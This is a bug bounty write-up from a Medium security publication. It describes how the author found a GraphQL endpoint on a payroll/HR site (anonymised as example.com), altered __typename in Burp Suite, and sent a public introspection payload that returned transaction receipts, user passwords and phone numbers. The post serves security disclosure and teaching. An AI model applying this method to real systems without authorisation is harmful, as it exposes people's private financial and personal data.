GraphQL introspection leads to sensitive data disclosure.

Eshan Singh
Oct 30, 2019 · 3 min read
Image for post
Image for post
source: lynda.com

Introduction

Hello World! I’m Eshan Singh, aka R0X4R. I’m that hacker teenager that your friends told you about. I hack web-server to make the system secure. I’m here to share my recent findings on GraphQL Introspection.

What is GraphQL

All of us know that Facebook uses its own query language to store its data properly. So, according to GraphQL.org GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL provides a complete and understandable description of the data in your API, gives clients the power to ask for exactly what they need, and nothing more, makes it easier to evolve APIs over time, and enables powerful developer tools.

About this vulnerability

For Discovering this bug, I learned the fundamentals of GraphQL for at least 5–6 hours and read all other relevant bug reports, especially Namhamsec’s GraphQL CTF Challenge.

After that, I saw a new program on Bugcrowd, so I participated in it. They gave me a domain [let’s take the domain as example.com because the vulnerability hasn’t fixed yet], i.e. example.com. So I make an account on that domain, then fire burpsuite and added example.com for spidering; after 10–20 secs, I saw that the example.com/graphql, so I got an idea that example.com uses Graphql for their API management.

Image for post
Image for post
source: almostdumb.com

Tools that I used in this

  • Burpsuite
  • Burpsuite Extensions — JSON Beautifier and GraphQL Raider
  • A Web Browser [Firefox] :P

How I got the vulnerability

First I logged out and logged in again on example.com, then I went to the ‘Update Profile’ section and changed my name from Eshan Singh to Singh Eshan and clicked save. And, then intercepted that request and sent it repeater, then I saw something interesting i.e.

Image for post
Image for post

__typename with PayRollAdmin, so I replaced it with xyz then I again send the request and then checked the response xyz reflects on PayRollAdmin place.

So, for digging more into this, I googled GraphQL Exploits, then I saw a Hackerone disclosed the vulnerability, i.e. https://hackerone.com/reports/291531. So I thought let’s try the same that this guy did on this report.

I googled Introspection GraphQL Payloads, and I got this from PayloadAllTheThings repo:

Image for post
Image for post
Image for post
Image for post

Then I copied the payload and pasted it on graphql tab in burpsuite and sent the request, and walla! I got a juicy response.

Image for post
Image for post
source: https://tenor.com/view/omg-oh-my-god-wow-gif-11411674

Impact of this

The application is basically used by payrolls and HR. So when I exploit it I was able to retrieve receipt of transactions and users passwords phone numbers and more

Thanks and regards

Eshan Singh [R0X4R]

Signing out…

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeups Take a look

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Eshan Singh

Written by

Hi.. I’m that hacker teenager that your friends told you about. I hack to make system secure. Hacker — Developer — Influencer — Graphics Designer

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Eshan Singh

Written by

Hi.. I’m that hacker teenager that your friends told you about. I hack to make system secure. Hacker — Developer — Influencer — Graphics Designer

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store